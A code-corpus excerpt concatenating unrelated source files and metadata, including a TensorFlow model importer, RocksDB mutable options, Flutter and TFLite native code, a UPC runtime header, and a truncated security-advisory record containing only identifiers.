virtual ex_index_out_of_bounds* clone() const;
/*
* Throw the exception.
*/
virtual void raise() const;
/*
* Get the out-of-bounds index.
*/
virtual unsigned long index() const;
protected:
unsigned long _index; /* index */
};
} /* namespace exceptions */
} /* namespace lang */
#endif
| 415 |
5,823 | <filename>shell/platform/glfw/headless_event_loop.cc
// Copyright 2013 The Flutter Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "flutter/shell/platform/glfw/headless_event_loop.h"
#include <atomic>
#include <utility>
namespace flutter {
HeadlessEventLoop::HeadlessEventLoop(std::thread::id main_thread_id,
const TaskExpiredCallback& on_task_expired)
: EventLoop(main_thread_id, std::move(on_task_expired)) {}
HeadlessEventLoop::~HeadlessEventLoop() = default;
void HeadlessEventLoop::WaitUntil(const TaskTimePoint& time) {
std::mutex& mutex = GetTaskQueueMutex();
std::unique_lock<std::mutex> lock(mutex);
task_queue_condition_.wait_until(lock, time);
}
void HeadlessEventLoop::Wake() {
task_queue_condition_.notify_one();
}
} // namespace flutter
| 328 |
4,071 | /*
* \file tensorflow_importer.cc
* \brief The tensorflow importer
*/
#include "blaze/model_importer/tensorflow_importer.h"
#include "blaze/common/proto_configure.h"
#include "blaze/common/string_util.h"
namespace blaze {
TensorFlowImporter::TensorFlowImporter() {
SetProcessNodeFunction("Placeholder", [this](const tensorflow::NodeDef& node) {
this->ProcessPlaceholderOp(node); });
SetProcessNodeFunction("Const", [this](const tensorflow::NodeDef& node) {
this->ProcessConstOp(node); });
SetProcessNodeFunction("Identity", [this](const tensorflow::NodeDef& node) {
this->ProcessIdentityOp(node); });
SetProcessNodeFunction("MatMul", [this](const tensorflow::NodeDef& node) {
this->ProcessMatMulOp(node); });
SetProcessNodeFunction("Add", [this](const tensorflow::NodeDef& node) {
this->ProcessAddOp(node); });
SetProcessNodeFunction("Mul", [this](const tensorflow::NodeDef& node) {
this->ProcessMulOp(node); });
SetProcessNodeFunction("Maximum", [this](const tensorflow::NodeDef& node) {
this->ProcessMaximumOp(node); });
SetProcessNodeFunction("Softmax", [this](const tensorflow::NodeDef& node) {
this->ProcessSoftmaxOp(node); });
}
void TensorFlowImporter::LoadModel(const char* conf_file, const char* data_file) {
ProtoConfigure config;
auto rc = config.Init("tensorflow.MetaGraphDef", conf_file);
if (rc != ProtoConfigure::kOK) {
BLAZE_THROW("Parse tensorflow.MetaGraphDef failed file=", conf_file);
}
graph_def_ = (*(reinterpret_cast<const tensorflow::MetaGraphDef*>(config.config()))).graph_def();
LoadCkpt(data_file);
Tensorflow2Blaze();
}
void TensorFlowImporter::LoadModelFromString(const std::string& conf_str, const char* data_file) {
tensorflow::MetaGraphDef meta_graph_def;
meta_graph_def.ParseFromArray(const_cast<char*>(conf_str.c_str()), conf_str.size());
graph_def_ = meta_graph_def.graph_def();
LOG_INFO("graph_def_=%s", graph_def_.DebugString().c_str());
LoadCkpt(data_file);
Tensorflow2Blaze();
}
void TensorFlowImporter::LoadCkpt(const char* data_file) {
tf_param_.Load(data_file);
for (auto i = 0; i < tf_param_.keys.size(); ++i) {
LOG_INFO("name=%s", tf_param_.keys[i].c_str());
const auto& array = tf_param_.ndarray[i];
size_t size = 1;
for (const auto& dim : array.shape) size *= dim;
for (auto i = 0; i < size; ++i) {
LOG_DEBUG("data[%d]=%f", i, array.data[i].f);
}
}
LOG_ERROR("Loading Chpt is not implemented");
}
void TensorFlowImporter::Tensorflow2Blaze() {
// Step1: init name_rewrite
#if 0
for (const auto& node : graph_def_.node()) {
if (node.op() == "Identity") {
std::string input_node_name;
int index;
GetInput(node.input(0), &input_node_name, &index);
if (const_name_set_.count(input_node_name)) {
name_rewrite_[node.name()] = input_node_name;
}
} else if (node.op() == "Const") {
const_name_set_.insert(node.name());
}
}
// Step2: op conversion
for (const auto& node : graph_def_.node()) {
const auto& op_type = node.op();
const auto& iter = op_process_func_map_.find(op_type);
CHECK_TRUE(iter != op_process_func_map_.end(),
" parse op_type=", op_type, " is not registered");
iter->second(node);
}
#endif
LOG_INFO("net_def=%s", net_def_.DebugString().c_str());
}
void TensorFlowImporter::ProcessPlaceholderOp(const tensorflow::NodeDef& node) {
auto value_info = net_def_.add_external_input();
value_info->set_name(node.name());
// set dtype
const auto& dtype_iter = node.attr().find("dtype");
CHECK_TRUE(dtype_iter != node.attr().end());
value_info->set_dtype(GetDataType(dtype_iter->second.type()));
// set shape
}
void TensorFlowImporter::ProcessConstOp(const tensorflow::NodeDef& node) {
auto op = AddOperatorDef(node, "ConstantFill");
}
void TensorFlowImporter::ProcessIdentityOp(const tensorflow::NodeDef& node) {
const auto& input = node.input(0);
std::string iname;
int index;
GetInput(input, &iname, &index);
if (const_name_set_.count(iname)) {
return;
}
AddOperatorDef(node, "Identity");
}
void TensorFlowImporter::ProcessMatMulOp(const tensorflow::NodeDef& node) {
const auto& transpose_a_iter = node.attr().find("transpose_a");
const auto& transpose_b_iter = node.attr().find("transpose_b");
CHECK_NE(transpose_a_iter, node.attr().end());
CHECK_NE(transpose_b_iter, node.attr().end());
auto op = AddOperatorDef(node, "Gemm");
auto arg = op->add_arg();
arg->set_name("transepose_a");
arg->set_i(transpose_a_iter->second.b() ? 1 : 0);
arg = op->add_arg();
arg->set_name("transpose_b");
arg->set_i(transpose_b_iter->second.b() ? 1 : 0);
}
void TensorFlowImporter::ProcessAddOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Add");
}
void TensorFlowImporter::ProcessMulOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Mul");
}
void TensorFlowImporter::ProcessMaximumOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Max");
}
void TensorFlowImporter::ProcessSoftmaxOp(const tensorflow::NodeDef& node) {
AddOperatorDef(node, "Softmax");
}
OperatorDef* TensorFlowImporter::AddOperatorDef(
const tensorflow::NodeDef& node, const char* op_type, int onum) {
const auto& op_name = node.name();
auto op = net_def_.add_op();
op->set_name(op_name);
op->set_type(op_type);
// init iname
std::string input_node_name;
int index;
for (const auto& entry : node.input()) {
GetInput(entry, &input_node_name, &index);
const auto& name_rewrite_iter = name_rewrite_.find(input_node_name);
if (name_rewrite_iter != name_rewrite_.end()) {
input_node_name = name_rewrite_iter->second;
}
op->add_input(input_node_name + (index == 0 ? "" : std::to_string(index)));
}
// init oname
for (auto i = 0; i < onum; ++i) {
op->add_output(op_name + (i == 0 ? "" : std::to_string(i)));
}
return op;
}
void TensorFlowImporter::GetInput(const std::string& input_str, std::string* node_name, int* index) {
auto splits = Split(input_str, ':');
CHECK_TRUE(splits.size() >= 1);
*node_name = splits[0];
*index = 0;
if (splits.size() > 1) {
*index = std::stoi(splits[1].c_str());
}
}
DataType TensorFlowImporter::GetDataType(tensorflow::DataType data_type) {
switch (data_type) {
case tensorflow::DT_FLOAT:
return kFloat;
case tensorflow::DT_DOUBLE:
return kDouble;
case tensorflow::DT_INT32:
return kInt32;
default:
BLAZE_THROW("tensoflow data_type=", data_type, " is not supported");
}
}
void TensorFlowImporter::SetProcessNodeFunction(
const std::string& name, TensorFlowImporter::ProcessOpNodeFunction function) {
op_process_func_map_[name] = function;
}
} // namespace blaze
| 2,775 |
420 | #!/usr/bin/env python
from distutils.core import setup
long_description = '''
Essential Paxos provides basic implementations of the Paxos algorithm. The
distinguishing characteristic of this implementation, as compared to other
freely available and open-source implementations, is that this library is
independent of application domains and networking infrastructures. Whereas most
Paxos implementations are deeply and inextricably embedded within
application-specific logic, this implementation focuses on encapsulating the
Paxos algorithm within opaque and easily re-usable classes.
This library provides an algorithmically correct Paxos implementation that may
be used for educational purposes in addition to direct use in networked
applications. This implementation is specifically designed to facilitate
understanding of both the essential Paxos algorithm as well as the practical
considerations that must be taken into account for real-world use.
'''
setup(name='essential-paxos',
version='2.0',
description='Paxos algorithm implementation suitable for practical and educational use',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/cocagne/paxos',
packages=['paxos'],
license='MIT',
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: System :: Distributed Computing',
'Topic :: System :: Networking']
)
| 520 |
6,098 | package hex.schemas;
import hex.ensemble.StackedEnsembleModel;
import water.api.API;
import water.api.EnumValuesProvider;
import water.api.schemas3.KeyV3;
import water.api.schemas3.ModelOutputSchemaV3;
import water.api.schemas3.ModelSchemaV3;
public class StackedEnsembleModelV99 extends ModelSchemaV3<StackedEnsembleModel, StackedEnsembleModelV99, StackedEnsembleModel.StackedEnsembleParameters, StackedEnsembleV99.StackedEnsembleParametersV99, StackedEnsembleModel.StackedEnsembleOutput, StackedEnsembleModelV99.StackedEnsembleModelOutputV99> {
public static final class StackedEnsembleModelOutputV99 extends ModelOutputSchemaV3<StackedEnsembleModel.StackedEnsembleOutput, StackedEnsembleModelOutputV99> {
@API(help="Model which combines the base_models into a stacked ensemble.", direction = API.Direction.OUTPUT)
KeyV3.ModelKeyV3 metalearner;
@API(help="Level one frame used for metalearner training.", direction = API.Direction.OUTPUT)
KeyV3.FrameKeyV3 levelone_frame_id;
@API(help="The stacking strategy used for training.", valuesProvider = StackingStrategyProvider.class, direction = API.Direction.OUTPUT)
StackedEnsembleModel.StackingStrategy stacking_strategy;
}
public static class StackingStrategyProvider extends EnumValuesProvider<StackedEnsembleModel.StackingStrategy> {
public StackingStrategyProvider() {
super(StackedEnsembleModel.StackingStrategy.class);
}
}
public StackedEnsembleV99.StackedEnsembleParametersV99 createParametersSchema() { return new StackedEnsembleV99.StackedEnsembleParametersV99(); }
public StackedEnsembleModelOutputV99 createOutputSchema() { return new StackedEnsembleModelOutputV99(); }
@Override public StackedEnsembleModel createImpl() {
StackedEnsembleV99.StackedEnsembleParametersV99 p = this.parameters;
StackedEnsembleModel.StackedEnsembleParameters parms = p.createImpl();
return new StackedEnsembleModel(model_id.key(), parms, new StackedEnsembleModel.StackedEnsembleOutput());
}
}
| 625 |
675 | <reponame>hase1128/dragonfly<filename>examples/detailed_use_cases/obj_5d.py
"""
Synthetic function for 5D optimisation.
-- kirthevasank
"""
from moo_5d import compute_objectives as moo_objectives
def objective(x):
""" Computes the objectives. """
return moo_objectives(x)[0] # Just returns conductivity
| 108 |
435 | <reponame>allen91wu/data
{
"description": "The Pandas soon realized there's no way they are going to survive the\nordeals and hardships of this world, if they didn't finally and without\nthe blink of an eye of hesitation pull themselves together, stop being\nthe lazy fluffy beings, they have long been known for and start\nreorganizing their lives ASAP. They needed a fresh view over the world\nand its intrinsic mechanisms, light had to be shed upon the information\nthey possessed about survival, in a few words, they had to start over.\nThis is how in the midst of the forest a high performative library was\ncoming to life, whose powerful toolkit would enable them a long lasting\nlife of happiness and joy. This long-dreamed library should import the\ninformation they have been gathering about the world for long gone\ncenturies and help them look at it through different eyes. They wanted\nto structure their world views and beliefs into sensible types and\ncategories, remove from their genes their procrastinative behavioural\npatterns, drop them altogether. After laborious efforts of dealing with\nmissing data about their surroundings, grouping and counting the\nmeaningful rest, filtering the nonsensical superstitions, they could\nfinally and, without doubt, point out with precision, where the bamboo\nsprouts were freshest, most succulent, fiber rich, absolutely\nscrumptious and the moment of the year, dictated by the moon calendar,\nwhen they are fluffiest, cosiest, most willing and irresistibly fall for\none another and cuddle up. They put all this secret survival kit into\neasily understandable pictures and graphs for the dreamers out of them,\nwho weren't prepared to put in all the effort of learning all those\ncomplicated symbols, just in order to survive and just wanted to admire\nthe sky goddess, the moon. But wait, they didn't have a name for their\ngrandiose library, so they just wanted to make a statement of being the\nmost diligent creature of them all and called it, simply and\nunmistakably, pandas!\n",
"duration": 1542,
"language": "eng",
"published_at": "2019-08-06T12:18:06.000Z",
"recorded": "2019-03-24",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/WCeJpJ9yT7Y/hqdefault.jpg",
"title": "The Apprentice's Enthusiastic Guide to pandas (or how to look at the world through the gentle eyes of one)",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=WCeJpJ9yT7Y"
}
]
}
| 683 |
12,278 | <gh_stars>1000+
// Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
package org.rocksdb;
import java.util.*;
public abstract class AbstractMutableOptions {
protected static final String KEY_VALUE_PAIR_SEPARATOR = ";";
protected static final char KEY_VALUE_SEPARATOR = '=';
static final String INT_ARRAY_INT_SEPARATOR = ",";
protected final String[] keys;
private final String[] values;
/**
* User must use builder pattern, or parser.
*
* @param keys the keys
* @param values the values
*/
protected AbstractMutableOptions(final String[] keys, final String[] values) {
this.keys = keys;
this.values = values;
}
String[] getKeys() {
return keys;
}
String[] getValues() {
return values;
}
/**
* Returns a string representation of MutableOptions which
* is suitable for consumption by {@code #parse(String)}.
*
* @return String representation of MutableOptions
*/
@Override
public String toString() {
final StringBuilder buffer = new StringBuilder();
for(int i = 0; i < keys.length; i++) {
buffer
.append(keys[i])
.append(KEY_VALUE_SEPARATOR)
.append(values[i]);
if(i + 1 < keys.length) {
buffer.append(KEY_VALUE_PAIR_SEPARATOR);
}
}
return buffer.toString();
}
public static abstract class AbstractMutableOptionsBuilder<
T extends AbstractMutableOptions,
U extends AbstractMutableOptionsBuilder<T, U, K>,
K extends MutableOptionKey> {
private final Map<K, MutableOptionValue<?>> options = new LinkedHashMap<>();
protected abstract U self();
/**
* Get all of the possible keys
*
* @return A map of all keys, indexed by name.
*/
protected abstract Map<String, K> allKeys();
/**
* Construct a sub-class instance of {@link AbstractMutableOptions}.
*
* @param keys the keys
* @param values the values
*
* @return an instance of the options.
*/
protected abstract T build(final String[] keys, final String[] values);
public T build() {
final String keys[] = new String[options.size()];
final String values[] = new String[options.size()];
int i = 0;
for (final Map.Entry<K, MutableOptionValue<?>> option : options.entrySet()) {
keys[i] = option.getKey().name();
values[i] = option.getValue().asString();
i++;
}
return build(keys, values);
}
protected U setDouble(
final K key, final double value) {
if (key.getValueType() != MutableOptionKey.ValueType.DOUBLE) {
throw new IllegalArgumentException(
key + " does not accept a double value");
}
options.put(key, MutableOptionValue.fromDouble(value));
return self();
}
protected double getDouble(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asDouble();
}
protected U setLong(
final K key, final long value) {
if(key.getValueType() != MutableOptionKey.ValueType.LONG) {
throw new IllegalArgumentException(
key + " does not accept a long value");
}
options.put(key, MutableOptionValue.fromLong(value));
return self();
}
protected long getLong(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asLong();
}
protected U setInt(
final K key, final int value) {
if(key.getValueType() != MutableOptionKey.ValueType.INT) {
throw new IllegalArgumentException(
key + " does not accept an integer value");
}
options.put(key, MutableOptionValue.fromInt(value));
return self();
}
protected int getInt(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asInt();
}
protected U setBoolean(
final K key, final boolean value) {
if(key.getValueType() != MutableOptionKey.ValueType.BOOLEAN) {
throw new IllegalArgumentException(
key + " does not accept a boolean value");
}
options.put(key, MutableOptionValue.fromBoolean(value));
return self();
}
protected boolean getBoolean(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asBoolean();
}
protected U setIntArray(
final K key, final int[] value) {
if(key.getValueType() != MutableOptionKey.ValueType.INT_ARRAY) {
throw new IllegalArgumentException(
key + " does not accept an int array value");
}
options.put(key, MutableOptionValue.fromIntArray(value));
return self();
}
protected int[] getIntArray(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if(value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
return value.asIntArray();
}
protected <N extends Enum<N>> U setEnum(
final K key, final N value) {
if(key.getValueType() != MutableOptionKey.ValueType.ENUM) {
throw new IllegalArgumentException(
key + " does not accept a Enum value");
}
options.put(key, MutableOptionValue.fromEnum(value));
return self();
}
@SuppressWarnings("unchecked")
protected <N extends Enum<N>> N getEnum(final K key)
throws NoSuchElementException, NumberFormatException {
final MutableOptionValue<?> value = options.get(key);
if (value == null) {
throw new NoSuchElementException(key.name() + " has not been set");
}
if (!(value instanceof MutableOptionValue.MutableOptionEnumValue)) {
throw new NoSuchElementException(key.name() + " is not of Enum type");
}
return ((MutableOptionValue.MutableOptionEnumValue<N>) value).asObject();
}
public U fromString(
final String keyStr, final String valueStr)
throws IllegalArgumentException {
Objects.requireNonNull(keyStr);
Objects.requireNonNull(valueStr);
final K key = allKeys().get(keyStr);
switch(key.getValueType()) {
case DOUBLE:
return setDouble(key, Double.parseDouble(valueStr));
case LONG:
return setLong(key, Long.parseLong(valueStr));
case INT:
return setInt(key, Integer.parseInt(valueStr));
case BOOLEAN:
return setBoolean(key, Boolean.parseBoolean(valueStr));
case INT_ARRAY:
final String[] strInts = valueStr
.trim().split(INT_ARRAY_INT_SEPARATOR);
if(strInts == null || strInts.length == 0) {
throw new IllegalArgumentException(
"int array value is not correctly formatted");
}
final int value[] = new int[strInts.length];
int i = 0;
for(final String strInt : strInts) {
value[i++] = Integer.parseInt(strInt);
}
return setIntArray(key, value);
}
throw new IllegalStateException(
key + " has unknown value type: " + key.getValueType());
}
}
}
| 3,068 |
482 | <filename>code/iaas/logic/src/main/java/io/cattle/platform/process/cache/ClearCacheHandler.java
package io.cattle.platform.process.cache;
import io.cattle.platform.core.cache.DBCacheManager;
import io.cattle.platform.deferred.util.DeferredUtils;
import io.cattle.platform.engine.handler.AbstractProcessLogic;
import io.cattle.platform.engine.handler.HandlerResult;
import io.cattle.platform.engine.handler.ProcessPostListener;
import io.cattle.platform.engine.process.ProcessInstance;
import io.cattle.platform.engine.process.ProcessState;
import io.cattle.platform.eventing.EventService;
import io.cattle.platform.eventing.model.EventVO;
import io.cattle.platform.iaas.event.IaasEvents;
import io.cattle.platform.util.type.Priority;
import javax.inject.Inject;
import javax.inject.Named;
@Named
public class ClearCacheHandler extends AbstractProcessLogic implements ProcessPostListener, Priority {
@Inject
EventService eventService;
@Inject
DBCacheManager cacheManager;
@Override
public String[] getProcessNames() {
return new String[] {
"externalhandler.*",
"externalhandlerexternalhandlerprocessmap.*",
"externalhandlerprocess.*",
"externalhandler.*",
"dynamicschema.*"
};
}
@Override
public HandlerResult handle(ProcessState state, ProcessInstance process) {
cacheManager.clear();
DeferredUtils.defer(new Runnable() {
@Override
public void run() {
eventService.publish(EventVO.newEvent(IaasEvents.CLEAR_CACHE));
cacheManager.clear();
}
});
return null;
}
@Override
public int getPriority() {
return Integer.MAX_VALUE;
}
} | 709 |
488 | #include<stdalign.h>
// void *aligned_alloc(size_t algn, size_t size);
void foo()
{
// Test use of the aligned_alloc() function defined in stdalign.h
void* memory = aligned_alloc(1,2);
}
| 77 |
463 | <reponame>dentou/Hive2Hive
package org.hive2hive.core.exceptions;
public class NoSessionException extends Hive2HiveException {
private static final long serialVersionUID = 4263677549436609207L;
public NoSessionException() {
super("No session found.");
}
}
| 86 |
314 | //
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by <NAME>.
//
#import "CDStructures.h"
#import <IDEKit/IDEMediaRepository.h>
#import "IDEDefaultMediaLibrary-Protocol.h"
@class IDEFileReferenceContainerObserver, IDETimedInvalidatableObjectCache, NSSet, NSString;
@interface IDEContainerContentsMediaRepository : IDEMediaRepository <IDEDefaultMediaLibrary>
{
IDEFileReferenceContainerObserver *_observer;
id _containerContentObservationToken;
IDETimedInvalidatableObjectCache *_timedCache;
}
+ (id)mediaRepositoryForContainer:(id)arg1 fileDataTypes:(id)arg2;
+ (dispatch_block_t)cleanupHandlerBlock;
+ (dispatch_block_t)updateHandlerBlock;
+ (id)containerObserverIdentifer;
+ (id)allSupportedMediaFileDataTypes;
+ (void)cleanupFileReferenceContainerObserverResult:(id)arg1 forPath:(id)arg2;
+ (id)handleFileReferenceContainerObserverChange:(long long)arg1 forPath:(id)arg2 withDataType:(id)arg3;
+ (void)discardMediaRepositoryForContainerObserver:(id)arg1;
+ (id)mediaRepositoryForContainerObserver:(id)arg1;
+ (id)containerObserverToRepositoryMap;
- (void)fileReferenceObserverDidReportUpdatedAndAddedResourcesByPath:(id)arg1 removedPaths:(id)arg2;
- (void)willRegisterMediaRepositoryObserver;
- (void)didUnregisterMediaRepositoryObserver;
@property(readonly) NSSet *types;
- (id)resources;
- (void)primitiveInvalidate;
- (void)_startObserving;
- (id)initWithContainerObserver:(id)arg1;
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@end
| 564 |
190,993 | /* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include <jni.h>
#include "tensorflow/lite/core/shims/c/common.h"
#include "tensorflow/lite/delegates/xnnpack/xnnpack_delegate.h"
#include "tensorflow/lite/java/src/main/native/jni_utils.h"
using tflite::jni::CastLongToPointer;
namespace {
using DeleteFunction = void(TfLiteDelegate*);
TfLiteDelegate* convertLongToDelegate(JNIEnv* env, jlong delegate_handle) {
return CastLongToPointer<TfLiteDelegate>(env, delegate_handle);
}
DeleteFunction* convertLongToDeleteFunction(JNIEnv* env,
jlong delete_function) {
return CastLongToPointer<DeleteFunction>(env, delete_function);
}
} // anonymous namespace.
extern "C" {
JNIEXPORT void JNICALL
Java_org_tensorflow_lite_XnnpackDelegate_applyDeleteFunction(
JNIEnv* env, jclass clazz, jlong delete_function_handle,
jlong delegate_handle) {
if (!tflite::jni::CheckJniInitializedOrThrow(env)) return;
TfLiteDelegate* delegate = convertLongToDelegate(env, delegate_handle);
if (delegate == nullptr) return;
DeleteFunction* delete_function =
convertLongToDeleteFunction(env, delete_function_handle);
if (delete_function == nullptr) return;
delete_function(delegate);
}
} // extern "C"
| 617 |
488 | <gh_stars>100-1000
/// \file ParallelRTS.upc
///
/// \brief communication interface for RTED/UPC
///
/// \email <EMAIL>
#ifndef _PARALLEL_RTS_H
#define _PARALLEL_RTS_H
#include "CppRuntimeSystem/rted_iface_structs.h"
#include "CppRuntimeSystem/ptrops.h"
#ifdef __cplusplus
extern "C"
{
#endif /* __cplusplus */
#ifdef WITH_UPC
/// \brief polls incoming message buffer
void rted_ProcessMsg(void);
/// \brief sends a free message to all other processes
void snd_FreeMemory(rted_Address addr, rted_AllocKind freeKind, rted_SourceInfo si);
/// \brief shares information about non-local heap allocations
void snd_AllocMem(rted_TypeDesc, rted_Address, rted_Address, long, size_t, rted_AllocKind, const char*, rted_SourceInfo);
/// \brief shares information about variable initializations
void snd_InitVariable(rted_TypeDesc, rted_Address, rted_Address, size_t, int, const char*, rted_SourceInfo);
/// \brief shares information about pointer movements
void snd_MovePointer(rted_TypeDesc, rted_Address, rted_Address, const char*, rted_SourceInfo);
/// \brief initializes the runtime system
void rted_UpcAllInitialize(void);
void rted_PrintStats(void);
#else /* WITH_UPC */
#define UNUSEDARG(X) ((void) &(X)) /* we write for C and C++ compilers ;) */
// when we do not use UPC, we compile the runtime system with empty
// implementations.
static inline
void rted_ProcessMsg(void)
{}
static inline
void snd_FreeMemory(rted_Address r, rted_AllocKind a, rted_SourceInfo s)
{
UNUSEDARG(r), UNUSEDARG(a), UNUSEDARG(s);
}
static inline
void snd_AllocMem(rted_TypeDesc td, rted_Address addr, rted_Address haddr, long blocksz, size_t mallocsz, rted_AllocKind ak, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(blocksz), UNUSEDARG(mallocsz), UNUSEDARG(ak), UNUSEDARG(cn), UNUSEDARG(si);
}
static inline
void snd_InitVariable(rted_TypeDesc td, rted_Address addr, rted_Address haddr, size_t sz, int pm, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(sz), UNUSEDARG(pm), UNUSEDARG(cn), UNUSEDARG(si);
}
static inline
void snd_MovePointer(rted_TypeDesc td, rted_Address addr, rted_Address haddr, const char* cn, rted_SourceInfo si)
{
UNUSEDARG(td), UNUSEDARG(addr), UNUSEDARG(haddr), UNUSEDARG(cn), UNUSEDARG(si);
}
/// \note even w/o UPC this function is needed b/c it will be the first function executed in main
/// it becomes the reference point for further RTED initializations at startup
/// \todo remove
static inline
void rted_UpcAllInitialize(void)
{}
static inline
void rted_PrintStats(void)
{}
#endif /* WITH_UPC */
#ifdef __cplusplus
} /* extern "C" */
#endif /* __cplusplus */
#endif /* _PARALLEL_RTS_H */
| 1,040 |
372 | <reponame>mjhopkins/google-api-java-client-services<gh_stars>100-1000
/*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.dlp.v2.model;
/**
* The rule that adjusts the likelihood of findings within a certain proximity of hotwords.
*
* <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is
* transmitted over HTTP when working with the Cloud Data Loss Prevention (DLP) API. For a detailed
* explanation see:
* <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a>
* </p>
*
* @author Google, Inc.
*/
@SuppressWarnings("javadoc")
public final class GooglePrivacyDlpV2HotwordRule extends com.google.api.client.json.GenericJson {
/**
* Regular expression pattern defining what qualifies as a hotword.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2Regex hotwordRegex;
/**
* Likelihood adjustment to apply to all matching findings.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2LikelihoodAdjustment likelihoodAdjustment;
/**
* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* The value may be {@code null}.
*/
@com.google.api.client.util.Key
private GooglePrivacyDlpV2Proximity proximity;
/**
* Regular expression pattern defining what qualifies as a hotword.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2Regex getHotwordRegex() {
return hotwordRegex;
}
/**
* Regular expression pattern defining what qualifies as a hotword.
* @param hotwordRegex hotwordRegex or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setHotwordRegex(GooglePrivacyDlpV2Regex hotwordRegex) {
this.hotwordRegex = hotwordRegex;
return this;
}
/**
* Likelihood adjustment to apply to all matching findings.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2LikelihoodAdjustment getLikelihoodAdjustment() {
return likelihoodAdjustment;
}
/**
* Likelihood adjustment to apply to all matching findings.
* @param likelihoodAdjustment likelihoodAdjustment or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setLikelihoodAdjustment(GooglePrivacyDlpV2LikelihoodAdjustment likelihoodAdjustment) {
this.likelihoodAdjustment = likelihoodAdjustment;
return this;
}
/**
* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* @return value or {@code null} for none
*/
public GooglePrivacyDlpV2Proximity getProximity() {
return proximity;
}
/**
* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* @param proximity proximity or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setProximity(GooglePrivacyDlpV2Proximity proximity) {
this.proximity = proximity;
return this;
}
@Override
public GooglePrivacyDlpV2HotwordRule set(String fieldName, Object value) {
return (GooglePrivacyDlpV2HotwordRule) super.set(fieldName, value);
}
@Override
public GooglePrivacyDlpV2HotwordRule clone() {
return (GooglePrivacyDlpV2HotwordRule) super.clone();
}
}
| 1,597 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-vh8v-h2hp-7m6q",
"modified": "2022-05-01T17:53:21Z",
"published": "2022-05-01T17:53:21Z",
"aliases": [
"CVE-2007-1419"
],
